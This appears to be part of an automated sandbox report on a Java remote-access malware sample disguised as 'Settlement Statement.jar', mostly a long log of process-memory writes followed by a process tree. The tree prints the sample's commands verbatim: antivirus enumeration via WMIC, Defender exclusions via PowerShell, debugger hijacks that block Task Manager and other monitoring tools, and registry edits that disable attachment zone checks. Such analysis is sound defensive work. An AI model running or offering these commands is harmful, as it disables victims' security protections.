193 PID 2828 wrote to memory of 2868 2828 cmd.exe 194 PID 2828 wrote to memory of 2868 2828 cmd.exe 194 PID 2828 wrote to memory of 2868 2828 cmd.exe 194 PID 1612 wrote to memory of 2880 1612 java.exe 195 PID 1612 wrote to memory of 2880 1612 java.exe 195 PID 1612 wrote to memory of 2880 1612 java.exe 195 PID 1612 wrote to memory of 2892 1612 java.exe 196 PID 1612 wrote to memory of 2892 1612 java.exe 196 PID 1612 wrote to memory of 2892 1612 java.exe 196 PID 2880 wrote to memory of 2916 2880 cmd.exe 198 PID 2880 wrote to memory of 2916 2880 cmd.exe 198 PID 2880 wrote to memory of 2916 2880 cmd.exe 198 PID 2880 wrote to memory of 2932 2880 cmd.exe 199 PID 2880 wrote to memory of 2932 2880 cmd.exe 199 PID 2880 wrote to memory of 2932 2880 cmd.exe 199 PID 1612 wrote to memory of 2960 1612 java.exe 200 PID 1612 wrote to memory of 2960 1612 java.exe 200 PID 1612 wrote to memory of 2960 1612 java.exe 200 PID 2960 wrote to memory of 2972 2960 cmd.exe 201 PID 2960 wrote to memory of 2972 2960 cmd.exe 201 PID 2960 wrote to memory of 2972 2960 cmd.exe 201 PID 2960 wrote to memory of 2988 2960 cmd.exe 202 PID 2960 wrote to memory of 2988 2960 cmd.exe 202 PID 2960 wrote to memory of 2988 2960 cmd.exe 202 PID 1612 wrote to memory of 3008 1612 java.exe 203 PID 1612 wrote to memory of 3008 1612 java.exe 203 PID 1612 wrote to memory of 3008 1612 java.exe 203 PID 1612 wrote to memory of 2032 1612 java.exe 205 PID 1612 wrote to memory of 2032 1612 java.exe 205 PID 1612 wrote to memory of 2032 1612 java.exe 205 PID 2032 wrote to memory of 2092 2032 cmd.exe 206 PID 2032 wrote to memory of 2092 2032 cmd.exe 206 PID 2032 wrote to memory of 2092 2032 cmd.exe 206 PID 2032 wrote to memory of 1584 2032 cmd.exe 207 PID 2032 wrote to memory of 1584 2032 cmd.exe 207 PID 2032 wrote to memory of 1584 2032 cmd.exe 207 PID 1612 wrote to memory of 1572 1612 java.exe 208 PID 1612 wrote to memory of 1572 1612 java.exe 208 PID 1612 wrote to memory of 1572 1612 java.exe 208 PID 1572 wrote to memory of 1520 1572 cmd.exe 209 PID 1572 wrote to memory of 1520 1572 cmd.exe 209 PID 1572 wrote to memory of 1520 1572 cmd.exe 209 PID 1612 wrote to memory of 2108 1612 java.exe 211 PID 1612 wrote to memory of 2108 1612 java.exe 211 PID 1612 wrote to memory of 2108 1612 java.exe 211 PID 1572 wrote to memory of 2264 1572 cmd.exe 212 PID 1572 wrote to memory of 2264 1572 cmd.exe 212 PID 1572 wrote to memory of 2264 1572 cmd.exe 212 PID 1612 wrote to memory of 2240 1612 java.exe 214 PID 1612 wrote to memory of 2240 1612 java.exe 214 PID 1612 wrote to memory of 2240 1612 java.exe 214 PID 1612 wrote to memory of 2304 1612 java.exe 215 PID 1612 wrote to memory of 2304 1612 java.exe 215 PID 1612 wrote to memory of 2304 1612 java.exe 215 PID 1612 wrote to memory of 2352 1612 java.exe 217 PID 1612 wrote to memory of 2352 1612 java.exe 217 PID 1612 wrote to memory of 2352 1612 java.exe 217 PID 1612 wrote to memory of 2412 1612 java.exe 218 PID 1612 wrote to memory of 2412 1612 java.exe 218 PID 1612 wrote to memory of 2412 1612 java.exe 218 PID 1612 wrote to memory of 2568 1612 java.exe 221 PID 1612 wrote to memory of 2568 1612 java.exe 221 PID 1612 wrote to memory of 2568 1612 java.exe 221 PID 1612 wrote to memory of 2224 1612 java.exe 222 PID 1612 wrote to memory of 2224 1612 java.exe 222 PID 1612 wrote to memory of 2224 1612 java.exe 222 PID 2352 wrote to memory of 2132 2352 cmd.exe 223 PID 2352 wrote to memory of 2132 2352 cmd.exe 223 PID 2352 wrote to memory of 2132 2352 cmd.exe 223 PID 2352 wrote to memory of 2544 2352 cmd.exe 225 PID 2352 wrote to memory of 2544 2352 cmd.exe 225 PID 2352 wrote to memory of 2544 2352 cmd.exe 225 PID 1612 wrote to memory of 2692 1612 java.exe 226 PID 1612 wrote to memory of 2692 1612 java.exe 226 PID 1612 wrote to memory of 2692 1612 java.exe 226 PID 1612 wrote to memory of 1332 1612 java.exe 227 PID 1612 wrote to memory of 1332 1612 java.exe 227 PID 1612 wrote to memory of 1332 1612 java.exe 227 PID 2692 wrote to memory of 2824 2692 cmd.exe 230 PID 2692 wrote to memory of 2824 2692 cmd.exe 230 PID 2692 wrote to memory of 2824 2692 cmd.exe 230 PID 1612 wrote to memory of 2840 1612 java.exe 231 PID 1612 wrote to memory of 2840 1612 java.exe 231 PID 1612 wrote to memory of 2840 1612 java.exe 231 PID 1612 wrote to memory of 2916 1612 java.exe 233 PID 1612 wrote to memory of 2916 1612 java.exe 233 PID 1612 wrote to memory of 2916 1612 java.exe 233 PID 1612 wrote to memory of 2932 1612 java.exe 235 PID 1612 wrote to memory of 2932 1612 java.exe 235 PID 1612 wrote to memory of 2932 1612 java.exe 235 PID 2692 wrote to memory of 520 2692 cmd.exe 237 PID 2692 wrote to memory of 520 2692 cmd.exe 237 PID 2692 wrote to memory of 520 2692 cmd.exe 237 PID 1612 wrote to memory of 276 1612 java.exe 238 PID 1612 wrote to memory of 276 1612 java.exe 238 PID 1612 wrote to memory of 276 1612 java.exe 238 PID 1612 wrote to memory of 1804 1612 java.exe 239 PID 1612 wrote to memory of 1804 1612 java.exe 239 PID 1612 wrote to memory of 1804 1612 java.exe 239 PID 1612 wrote to memory of 1496 1612 java.exe 241 PID 1612 wrote to memory of 1496 1612 java.exe 241 PID 1612 wrote to memory of 1496 1612 java.exe 241 PID 1496 wrote to memory of 2788 1496 cmd.exe 243 PID 1496 wrote to memory of 2788 1496 cmd.exe 243 PID 1496 wrote to memory of 2788 1496 cmd.exe 243 PID 1496 wrote to memory of 3024 1496 cmd.exe 244 PID 1496 wrote to memory of 3024 1496 cmd.exe 244 PID 1496 wrote to memory of 3024 1496 cmd.exe 244 PID 1612 wrote to memory of 1272 1612 java.exe 245 PID 1612 wrote to memory of 1272 1612 java.exe 245 PID 1612 wrote to memory of 1272 1612 java.exe 245 PID 1272 wrote to memory of 1852 1272 cmd.exe 246 PID 1272 wrote to memory of 1852 1272 cmd.exe 246 PID 1272 wrote to memory of 1852 1272 cmd.exe 246 PID 1272 wrote to memory of 1776 1272 cmd.exe 247 PID 1272 wrote to memory of 1776 1272 cmd.exe 247 PID 1272 wrote to memory of 1776 1272 cmd.exe 247 PID 1612 wrote to memory of 1088 1612 java.exe 248 PID 1612 wrote to memory of 1088 1612 java.exe 248 PID 1612 wrote to memory of 1088 1612 java.exe 248 PID 1088 wrote to memory of 1920 1088 cmd.exe 249 PID 1088 wrote to memory of 1920 1088 cmd.exe 249 PID 1088 wrote to memory of 1920 1088 cmd.exe 249 PID 1088 wrote to memory of 1924 1088 cmd.exe 250 PID 1088 wrote to memory of 1924 1088 cmd.exe 250 PID 1088 wrote to memory of 1924 1088 cmd.exe 250 PID 1612 wrote to memory of 1936 1612 java.exe 251 PID 1612 wrote to memory of 1936 1612 java.exe 251 PID 1612 wrote to memory of 1936 1612 java.exe 251 PID 1936 wrote to memory of 240 1936 cmd.exe 252 PID 1936 wrote to memory of 240 1936 cmd.exe 252 PID 1936 wrote to memory of 240 1936 cmd.exe 252 PID 1936 wrote to memory of 1132 1936 cmd.exe 253 PID 1936 wrote to memory of 1132 1936 cmd.exe 253 PID 1936 wrote to memory of 1132 1936 cmd.exe 253 PID 1612 wrote to memory of 2204 1612 java.exe 254 PID 1612 wrote to memory of 2204 1612 java.exe 254 PID 1612 wrote to memory of 2204 1612 java.exe 254 PID 2204 wrote to memory of 1484 2204 cmd.exe 255 PID 2204 wrote to memory of 1484 2204 cmd.exe 255 PID 2204 wrote to memory of 1484 2204 cmd.exe 255 PID 2204 wrote to memory of 560 2204 cmd.exe 256 PID 2204 wrote to memory of 560 2204 cmd.exe 256 PID 2204 wrote to memory of 560 2204 cmd.exe 256 PID 1612 wrote to memory of 792 1612 java.exe 257 PID 1612 wrote to memory of 792 1612 java.exe 257 PID 1612 wrote to memory of 792 1612 java.exe 257 PID 792 wrote to memory of 2000 792 cmd.exe 258 PID 792 wrote to memory of 2000 792 cmd.exe 258 PID 792 wrote to memory of 2000 792 cmd.exe 258 PID 792 wrote to memory of 584 792 cmd.exe 259 PID 792 wrote to memory of 584 792 cmd.exe 259 PID 792 wrote to memory of 584 792 cmd.exe 259 PID 1612 wrote to memory of 664 1612 java.exe 260 PID 1612 wrote to memory of 664 1612 java.exe 260 PID 1612 wrote to memory of 664 1612 java.exe 260 PID 664 wrote to memory of 1632 664 cmd.exe 261 PID 664 wrote to memory of 1632 664 cmd.exe 261 PID 664 wrote to memory of 1632 664 cmd.exe 261 PID 664 wrote to memory of 1300 664 cmd.exe 262 PID 664 wrote to memory of 1300 664 cmd.exe 262 PID 664 wrote to memory of 1300 664 cmd.exe 262 PID 1612 wrote to memory of 1796 1612 java.exe 263 PID 1612 wrote to memory of 1796 1612 java.exe 263 PID 1612 wrote to memory of 1796 1612 java.exe 263 PID 1796 wrote to memory of 2996 1796 cmd.exe 264 PID 1796 wrote to memory of 2996 1796 cmd.exe 264 PID 1796 wrote to memory of 2996 1796 cmd.exe 264 PID 1796 wrote to memory of 2992 1796 cmd.exe 265 PID 1796 wrote to memory of 2992 1796 cmd.exe 265 PID 1796 wrote to memory of 2992 1796 cmd.exe 265 PID 1612 wrote to memory of 1448 1612 java.exe 266 PID 1612 wrote to memory of 1448 1612 java.exe 266 PID 1612 wrote to memory of 1448 1612 java.exe 266 PID 1448 wrote to memory of 2004 1448 cmd.exe 267 PID 1448 wrote to memory of 2004 1448 cmd.exe 267 PID 1448 wrote to memory of 2004 1448 cmd.exe 267 PID 1448 wrote to memory of 1588 1448 cmd.exe 268 PID 1448 wrote to memory of 1588 1448 cmd.exe 268 PID 1448 wrote to memory of 1588 1448 cmd.exe 268 PID 1612 wrote to memory of 3016 1612 java.exe 269 PID 1612 wrote to memory of 3016 1612 java.exe 269 PID 1612 wrote to memory of 3016 1612 java.exe 269 PID 3016 wrote to memory of 3064 3016 cmd.exe 270 PID 3016 wrote to memory of 3064 3016 cmd.exe 270 PID 3016 wrote to memory of 3064 3016 cmd.exe 270 PID 3016 wrote to memory of 580 3016 cmd.exe 271 PID 3016 wrote to memory of 580 3016 cmd.exe 271 PID 3016 wrote to memory of 580 3016 cmd.exe 271 PID 1612 wrote to memory of 1660 1612 java.exe 272 PID 1612 wrote to memory of 1660 1612 java.exe 272 PID 1612 wrote to memory of 1660 1612 java.exe 272 PID 1660 wrote to memory of 1800 1660 cmd.exe 273 PID 1660 wrote to memory of 1800 1660 cmd.exe 273 PID 1660 wrote to memory of 1800 1660 cmd.exe 273 PID 1660 wrote to memory of 2120 1660 cmd.exe 274 PID 1660 wrote to memory of 2120 1660 cmd.exe 274 PID 1660 wrote to memory of 2120 1660 cmd.exe 274 PID 1612 wrote to memory of 2364 1612 java.exe 275 PID 1612 wrote to memory of 2364 1612 java.exe 275 PID 1612 wrote to memory of 2364 1612 java.exe 275 PID 2364 wrote to memory of 1876 2364 cmd.exe 276 PID 2364 wrote to memory of 1876 2364 cmd.exe 276 PID 2364 wrote to memory of 1876 2364 cmd.exe 276 PID 2364 wrote to memory of 892 2364 cmd.exe 277 PID 2364 wrote to memory of 892 2364 cmd.exe 277 PID 2364 wrote to memory of 892 2364 cmd.exe 277 PID 1612 wrote to memory of 1980 1612 java.exe 278 PID 1612 wrote to memory of 1980 1612 java.exe 278 PID 1612 wrote to memory of 1980 1612 java.exe 278 PID 1980 wrote to memory of 2076 1980 cmd.exe 279 PID 1980 wrote to memory of 2076 1980 cmd.exe 279 PID 1980 wrote to memory of 2076 1980 cmd.exe 279 PID 1980 wrote to memory of 2152 1980 cmd.exe 280 PID 1980 wrote to memory of 2152 1980 cmd.exe 280 PID 1980 wrote to memory of 2152 1980 cmd.exe 280 PID 1612 wrote to memory of 2052 1612 java.exe 281 PID 1612 wrote to memory of 2052 1612 java.exe 281 PID 1612 wrote to memory of 2052 1612 java.exe 281 PID 2052 wrote to memory of 2156 2052 cmd.exe 282 PID 2052 wrote to memory of 2156 2052 cmd.exe 282 PID 2052 wrote to memory of 2156 2052 cmd.exe 282 PID 2052 wrote to memory of 2380 2052 cmd.exe 283 PID 2052 wrote to memory of 2380 2052 cmd.exe 283 PID 2052 wrote to memory of 2380 2052 cmd.exe 283 PID 1612 wrote to memory of 2104 1612 java.exe 284 PID 1612 wrote to memory of 2104 1612 java.exe 284 PID 1612 wrote to memory of 2104 1612 java.exe 284 PID 2104 wrote to memory of 2080 2104 cmd.exe 285 PID 2104 wrote to memory of 2080 2104 cmd.exe 285 PID 2104 wrote to memory of 2080 2104 cmd.exe 285 PID 2104 wrote to memory of 2160 2104 cmd.exe 286 PID 2104 wrote to memory of 2160 2104 cmd.exe 286 PID 2104 wrote to memory of 2160 2104 cmd.exe 286 PID 1612 wrote to memory of 1656 1612 java.exe 287 PID 1612 wrote to memory of 1656 1612 java.exe 287 PID 1612 wrote to memory of 1656 1612 java.exe 287 PID 1656 wrote to memory of 1888 1656 cmd.exe 288 PID 1656 wrote to memory of 1888 1656 cmd.exe 288 PID 1656 wrote to memory of 1888 1656 cmd.exe 288 PID 1656 wrote to memory of 1576 1656 cmd.exe 289 PID 1656 wrote to memory of 1576 1656 cmd.exe 289 PID 1656 wrote to memory of 1576 1656 cmd.exe 289 PID 1612 wrote to memory of 2228 1612 java.exe 290 PID 1612 wrote to memory of 2228 1612 java.exe 290 PID 1612 wrote to memory of 2228 1612 java.exe 290 PID 2228 wrote to memory of 2300 2228 cmd.exe 291 PID 2228 wrote to memory of 2300 2228 cmd.exe 291 PID 2228 wrote to memory of 2300 2228 cmd.exe 291 PID 2228 wrote to memory of 2236 2228 cmd.exe 292 PID 2228 wrote to memory of 2236 2228 cmd.exe 292 PID 2228 wrote to memory of 2236 2228 cmd.exe 292 PID 1612 wrote to memory of 1832 1612 java.exe 293 PID 1612 wrote to memory of 1832 1612 java.exe 293 PID 1612 wrote to memory of 1832 1612 java.exe 293 PID 1832 wrote to memory of 956 1832 cmd.exe 294 PID 1832 wrote to memory of 956 1832 cmd.exe 294 PID 1832 wrote to memory of 956 1832 cmd.exe 294 PID 1832 wrote to memory of 2548 1832 cmd.exe 295 PID 1832 wrote to memory of 2548 1832 cmd.exe 295 PID 1832 wrote to memory of 2548 1832 cmd.exe 295 PID 1612 wrote to memory of 2368 1612 java.exe 296 PID 1612 wrote to memory of 2368 1612 java.exe 296 PID 1612 wrote to memory of 2368 1612 java.exe 296 PID 2368 wrote to memory of 2248 2368 cmd.exe 297 PID 2368 wrote to memory of 2248 2368 cmd.exe 297 PID 2368 wrote to memory of 2248 2368 cmd.exe 297 PID 2368 wrote to memory of 2320 2368 cmd.exe 298 PID 2368 wrote to memory of 2320 2368 cmd.exe 298 PID 2368 wrote to memory of 2320 2368 cmd.exe 298 PID 1612 wrote to memory of 2244 1612 java.exe 299 PID 1612 wrote to memory of 2244 1612 java.exe 299 PID 1612 wrote to memory of 2244 1612 java.exe 299 PID 2244 wrote to memory of 2264 2244 cmd.exe 300 PID 2244 wrote to memory of 2264 2244 cmd.exe 300 PID 2244 wrote to memory of 2264 2244 cmd.exe 300 PID 2244 wrote to memory of 2688 2244 cmd.exe 301 PID 2244 wrote to memory of 2688 2244 cmd.exe 301 PID 2244 wrote to memory of 2688 2244 cmd.exe 301 PID 1612 wrote to memory of 2504 1612 java.exe 302 PID 1612 wrote to memory of 2504 1612 java.exe 302 PID 1612 wrote to memory of 2504 1612 java.exe 302 PID 2504 wrote to memory of 2520 2504 cmd.exe 303 PID 2504 wrote to memory of 2520 2504 cmd.exe 303 PID 2504 wrote to memory of 2520 2504 cmd.exe 303 PID 2504 wrote to memory of 2436 2504 cmd.exe 304 PID 2504 wrote to memory of 2436 2504 cmd.exe 304 PID 2504 wrote to memory of 2436 2504 cmd.exe 304 PID 1612 wrote to memory of 2812 1612 java.exe 305 PID 1612 wrote to memory of 2812 1612 java.exe 305 PID 1612 wrote to memory of 2812 1612 java.exe 305 PID 2812 wrote to memory of 2752 2812 cmd.exe 306 PID 2812 wrote to memory of 2752 2812 cmd.exe 306 PID 2812 wrote to memory of 2752 2812 cmd.exe 306 PID 2812 wrote to memory of 2432 2812 cmd.exe 307 PID 2812 wrote to memory of 2432 2812 cmd.exe 307 PID 2812 wrote to memory of 2432 2812 cmd.exe 307 PID 1612 wrote to memory of 2492 1612 java.exe 308 PID 1612 wrote to memory of 2492 1612 java.exe 308 PID 1612 wrote to memory of 2492 1612 java.exe 308 PID 2492 wrote to memory of 2332 2492 cmd.exe 309 PID 2492 wrote to memory of 2332 2492 cmd.exe 309 PID 2492 wrote to memory of 2332 2492 cmd.exe 309 PID 2492 wrote to memory of 2624 2492 cmd.exe 310 PID 2492 wrote to memory of 2624 2492 cmd.exe 310 PID 2492 wrote to memory of 2624 2492 cmd.exe 310 PID 1612 wrote to memory of 2672 1612 java.exe 311 PID 1612 wrote to memory of 2672 1612 java.exe 311 PID 1612 wrote to memory of 2672 1612 java.exe 311 PID 2672 wrote to memory of 2644 2672 cmd.exe 312 PID 2672 wrote to memory of 2644 2672 cmd.exe 312 PID 2672 wrote to memory of 2644 2672 cmd.exe 312 PID 2672 wrote to memory of 2612 2672 cmd.exe 313 PID 2672 wrote to memory of 2612 2672 cmd.exe 313 PID 2672 wrote to memory of 2612 2672 cmd.exe 313 PID 1612 wrote to memory of 2412 1612 java.exe 314 PID 1612 wrote to memory of 2412 1612 java.exe 314 PID 1612 wrote to memory of 2412 1612 java.exe 314 PID 2412 wrote to memory of 2324 2412 cmd.exe 315 PID 2412 wrote to memory of 2324 2412 cmd.exe 315 PID 2412 wrote to memory of 2324 2412 cmd.exe 315 PID 2412 wrote to memory of 2392 2412 cmd.exe 316 PID 2412 wrote to memory of 2392 2412 cmd.exe 316 PID 2412 wrote to memory of 2392 2412 cmd.exe 316 PID 1612 wrote to memory of 2252 1612 java.exe 317 PID 1612 wrote to memory of 2252 1612 java.exe 317 PID 1612 wrote to memory of 2252 1612 java.exe 317 PID 2252 wrote to memory of 2296 2252 cmd.exe 318 PID 2252 wrote to memory of 2296 2252 cmd.exe 318 PID 2252 wrote to memory of 2296 2252 cmd.exe 318 PID 2252 wrote to memory of 2312 2252 cmd.exe 319 PID 2252 wrote to memory of 2312 2252 cmd.exe 319 PID 2252 wrote to memory of 2312 2252 cmd.exe 319 PID 1612 wrote to memory of 2440 1612 java.exe 320 PID 1612 wrote to memory of 2440 1612 java.exe 320 PID 1612 wrote to memory of 2440 1612 java.exe 320 PID 2440 wrote to memory of 2284 2440 cmd.exe 321 PID 2440 wrote to memory of 2284 2440 cmd.exe 321 PID 2440 wrote to memory of 2284 2440 cmd.exe 321 PID 2440 wrote to memory of 2724 2440 cmd.exe 322 PID 2440 wrote to memory of 2724 2440 cmd.exe 322 PID 2440 wrote to memory of 2724 2440 cmd.exe 322 PID 1612 wrote to memory of 2632 1612 java.exe 323 PID 1612 wrote to memory of 2632 1612 java.exe 323 PID 1612 wrote to memory of 2632 1612 java.exe 323 PID 2632 wrote to memory of 1528 2632 cmd.exe 324 PID 2632 wrote to memory of 1528 2632 cmd.exe 324 PID 2632 wrote to memory of 1528 2632 cmd.exe 324 PID 2632 wrote to memory of 2536 2632 cmd.exe 325 PID 2632 wrote to memory of 2536 2632 cmd.exe 325 PID 2632 wrote to memory of 2536 2632 cmd.exe 325 PID 1612 wrote to memory of 2628 1612 java.exe 326 PID 1612 wrote to memory of 2628 1612 java.exe 326 PID 1612 wrote to memory of 2628 1612 java.exe 326 PID 2628 wrote to memory of 2212 2628 cmd.exe 327 PID 2628 wrote to memory of 2212 2628 cmd.exe 327 PID 2628 wrote to memory of 2212 2628 cmd.exe 327 PID 2628 wrote to memory of 1440 2628 cmd.exe 328 PID 2628 wrote to memory of 1440 2628 cmd.exe 328 PID 2628 wrote to memory of 1440 2628 cmd.exe 328 PID 1612 wrote to memory of 1384 1612 java.exe 329 PID 1612 wrote to memory of 1384 1612 java.exe 329 PID 1612 wrote to memory of 1384 1612 java.exe 329 PID 1384 wrote to memory of 3060 1384 cmd.exe 330 PID 1384 wrote to memory of 3060 1384 cmd.exe 330 PID 1384 wrote to memory of 3060 1384 cmd.exe 330 PID 1384 wrote to memory of 2668 1384 cmd.exe 331 PID 1384 wrote to memory of 2668 1384 cmd.exe 331 PID 1384 wrote to memory of 2668 1384 cmd.exe 331 PID 1612 wrote to memory of 1128 1612 java.exe 332 PID 1612 wrote to memory of 1128 1612 java.exe 332 PID 1612 wrote to memory of 1128 1612 java.exe 332 PID 1128 wrote to memory of 2768 1128 cmd.exe 333 PID 1128 wrote to memory of 2768 1128 cmd.exe 333 PID 1128 wrote to memory of 2768 1128 cmd.exe 333 PID 1128 wrote to memory of 2568 1128 cmd.exe 334 PID 1128 wrote to memory of 2568 1128 cmd.exe 334 PID 1128 wrote to memory of 2568 1128 cmd.exe 334 PID 1612 wrote to memory of 2872 1612 java.exe 335 PID 1612 wrote to memory of 2872 1612 java.exe 335 PID 1612 wrote to memory of 2872 1612 java.exe 335 PID 2872 wrote to memory of 1332 2872 cmd.exe 336 PID 2872 wrote to memory of 1332 2872 cmd.exe 336 PID 2872 wrote to memory of 1332 2872 cmd.exe 336 PID 2872 wrote to memory of 2576 2872 cmd.exe 337 PID 2872 wrote to memory of 2576 2872 cmd.exe 337 PID 2872 wrote to memory of 2576 2872 cmd.exe 337 PID 1612 wrote to memory of 2896 1612 java.exe 338 PID 1612 wrote to memory of 2896 1612 java.exe 338 PID 1612 wrote to memory of 2896 1612 java.exe 338 PID 2896 wrote to memory of 2952 2896 cmd.exe 339 PID 2896 wrote to memory of 2952 2896 cmd.exe 339 PID 2896 wrote to memory of 2952 2896 cmd.exe 339 PID 2896 wrote to memory of 2928 2896 cmd.exe 340 PID 2896 wrote to memory of 2928 2896 cmd.exe 340 PID 2896 wrote to memory of 2928 2896 cmd.exe 340 PID 1612 wrote to memory of 2836 1612 java.exe 341 PID 1612 wrote to memory of 2836 1612 java.exe 341 PID 1612 wrote to memory of 2836 1612 java.exe 341 PID 2836 wrote to memory of 2968 2836 cmd.exe 342 PID 2836 wrote to memory of 2968 2836 cmd.exe 342 PID 2836 wrote to memory of 2968 2836 cmd.exe 342 PID 2836 wrote to memory of 2868 2836 cmd.exe 343 PID 2836 wrote to memory of 2868 2836 cmd.exe 343 PID 2836 wrote to memory of 2868 2836 cmd.exe 343 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1984 attrib.exe 1836 attrib.exe 1828 attrib.exe 1760 attrib.exe 1660 attrib.exe 1960 attrib.exe 1976 attrib.exe 1152 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Settlement Statement.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1824
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1960
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1976
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1152
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1984
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1836
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
PID:1760
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class2⤵
- Views/modifies file attributes
PID:1660
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1116
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1128
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1032
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1280
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1424
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:876
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1272
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1572
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:1500
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:332
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1176
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:2020
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1916
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1416
-
-
